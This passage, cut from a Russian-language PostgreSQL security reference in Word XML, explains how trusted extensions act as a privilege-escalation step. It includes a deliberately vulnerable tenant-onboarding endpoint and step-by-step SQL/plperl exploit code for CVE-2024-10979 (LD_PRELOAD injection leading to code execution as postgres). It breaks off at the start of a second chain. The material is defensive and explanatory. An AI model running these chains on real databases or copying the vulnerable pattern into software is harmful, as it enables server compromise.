        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «CREATE EXTENSION» — https://www.postgresql.org/docs/current/sql-createextension.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1555B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Packaging Related Objects into an Extension» — https://www.postgresql.org/docs/current/extend-extensions.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985CCBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 14.5 Release notes (Security Fixes) — https://www.postgresql.org/docs/release/14.5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C02D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R16 (sources/research.md, строки 254–259)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D4E071" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.5 Trusted extensions как ступень эскалации (R28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B34B0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Начиная с PostgreSQL 13.0 (январь 2021) расширения в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension.control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-файле могут быть помечены как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trusted = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Trusted extension можно установить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не-superuser-ом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, имеющим только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на БД — без специальной predefined-role, без USAGE на конкретные системные функции. Сами по себе trusted extensions </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sandboxed (plperl, hstore, pg_trgm, citext и т.д. — около 24 в стандартном contrib), но они становятся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ступенью эскалации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в комбинации с другими CVE: атакующий с минимальной привилегией CREATE-on-DB устанавливает trusted extension и получает доступ к функциональности, через которую эксплуатирует следующий вектор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36534987" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В этой карточке — два конкретных chain. Третий, четвёртый и т.д. возможны по той же модели; общее правило в саммари 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34389A08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7A0483" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/tenants/onboarding.py — multi-tenant SaaS-платформа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C0D1A"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075F6D80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F86CD0"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3F7352EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_tenant_admin_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46417FE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D49C08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72B3F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E5155" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/tenants/{tenant_id}/setup-search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3324D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def enable_full_text_search(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B19025A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C2403" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_tenant_admin_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E87D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D3903" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # tenant_admin роль имеет CREATE на собственной БД (tenant_X_db),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F10AFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # но не superuser. Self-service feature: тенант сам ставит pg_trgm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FA97D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # для full-text search на своих таблицах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55D383" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(text("CREATE EXTENSION IF NOT EXISTS pg_trgm"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA01DC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(text("CREATE EXTENSION IF NOT EXISTS plperl"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA36FA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF2606" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на своей БД, как у владельца БД. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оба trusted, оба устанавливаются без superuser. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>legitimate self-service паттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в SaaS-платформах с per-tenant databases (Crunchy Bridge, Supabase, отчасти RDS) — пока кто-то не воспользуется chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62626B2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 1 — CREATE EXTENSION plperl + CVE-2024-10979</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6839F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Самый прямой путь к RCE без superuser, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>единственный из chains в этой категории, дающий полный OS-level execution</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E468A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от tenant-admin или application-роли с CREATE на БД):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8F3B6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperl;  -- trusted, разрешено non-superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE71132" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">USAGE на язык </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после установки выдан PUBLIC автоматически (потому что trusted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B9424" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (тот же роль, эксплуатация CVE-2024-10979 — детали в 3.7.2b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBEEEEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION pg_temp.preload() RETURNS void LANGUAGE plperl AS $perl$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE04593" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  $ENV{'LD_PRELOAD'} = '/tmp/x.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9E594" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$perl$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55493C0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.preload();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75919E07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{...} = ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до фикса CVE-2024-10979 (17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21) не блокируется trusted-sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68748B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (триггер через любой spawn-вектор):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BD808" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY (SELECT '') TO PROGRAM 'true';  -- если есть pg_execute_server_program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AB7529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- или просто ждать autovacuum spawn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBA7FF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Когда backend spawn-ит подпроцесс, LD_PRELOAD активируется, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется. RCE как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBC094" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Полная карточка CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (требования к версии, доставка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, post-exploitation) — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A7E128" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что делает trusted-extension chain особенным</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий не может писать plperl-функции. Tenant_admin без права </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на untrusted-расширения был бы заблокирован. Trusted-флаг открывает путь к этому конкретному CVE для роли, которой раньше это было недоступно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B758AE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 2 — CREATE EXTENSION (non-superuser) + CVE-2022-2625 pre-create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675DC14A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Превращает CVE-2022-2625 (3.13.4) из «атаки на admin, ставящего extension» в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полностью самостоятельную атаку non-superuser</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD0EEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от tenant-admin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC241CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- pre-create функция с signature из install-script trusted extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A638661" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
